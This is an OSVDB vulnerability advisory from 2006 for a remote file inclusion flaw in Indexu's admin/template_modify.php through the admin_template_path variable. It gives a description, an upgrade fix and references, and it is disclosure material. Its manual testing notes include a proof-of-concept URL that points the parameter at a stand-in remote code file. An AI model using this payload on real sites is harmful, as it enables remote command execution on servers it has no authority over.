Indexu admin/template_modify.php admin_template_path Variable Remote File Inclusion

2006-06-16T00:00:00
ID OSVDB:39300
Type osvdb
Reporter OSVDB
Modified 2006-06-16T00:00:00

Description

Vulnerability Description

Indexu contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to 'admin/template_modify.php' not properly sanitizing user input supplied to the 'admin_template_path' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Solution Description

Upgrade to version 5.1.1 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

Short Description

Indexu admin/template_modify.php admin_template_path Variable Remote File Inclusion

Manual Testing Notes

http://[target]/indexu/admin/template_modify.php?admin_template_path=http://evilcode.txt?

References:

Vendor URL: http://www.nicecoder.com/ Security Tracker: 1016330 Secunia Advisory ID:18752 Related OSVDB ID: 39355 Related OSVDB ID: 39351 Related OSVDB ID: 39353 Related OSVDB ID: 39346 Related OSVDB ID: 39347 Related OSVDB ID: 39350 Related OSVDB ID: 39345 Related OSVDB ID: 39344 Related OSVDB ID: 39341 Related OSVDB ID: 39336 Related OSVDB ID: 39332 Related OSVDB ID: 39323 Related OSVDB ID: 39315 Related OSVDB ID: 39311 Related OSVDB ID: 39307 Related OSVDB ID: 39303 Related OSVDB ID: 39301 Related OSVDB ID: 1018090 Related OSVDB ID: 39342 Related OSVDB ID: 39339 Related OSVDB ID: 39338 Related OSVDB ID: 39337 Related OSVDB ID: 39331 Related OSVDB ID: 39330 Related OSVDB ID: 39324 Related OSVDB ID: 39326 Related OSVDB ID: 39313 Related OSVDB ID: 39314 Related OSVDB ID: 39317 Related OSVDB ID: 39308 Related OSVDB ID: 39309 Related OSVDB ID: 39310 Related OSVDB ID: 39306 Related OSVDB ID: 39352 Related OSVDB ID: 39354 Related OSVDB ID: 39349 Related OSVDB ID: 39340 Related OSVDB ID: 39334 Related OSVDB ID: 39333 Related OSVDB ID: 39327 Related OSVDB ID: 39328 Related OSVDB ID: 39318 Related OSVDB ID: 39319 Related OSVDB ID: 39316 Related OSVDB ID: 39312 Related OSVDB ID: 39300 Related OSVDB ID: 39348 Related OSVDB ID: 39343 Related OSVDB ID: 39335 Related OSVDB ID: 39329 Related OSVDB ID: 39325 Related OSVDB ID: 39320 Related OSVDB ID: 39321 Related OSVDB ID: 39322 Related OSVDB ID: 39305 Related OSVDB ID: 39302 Related OSVDB ID: 39304 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-06/0318.html ISS X-Force ID: 27262 CVE-2006-7017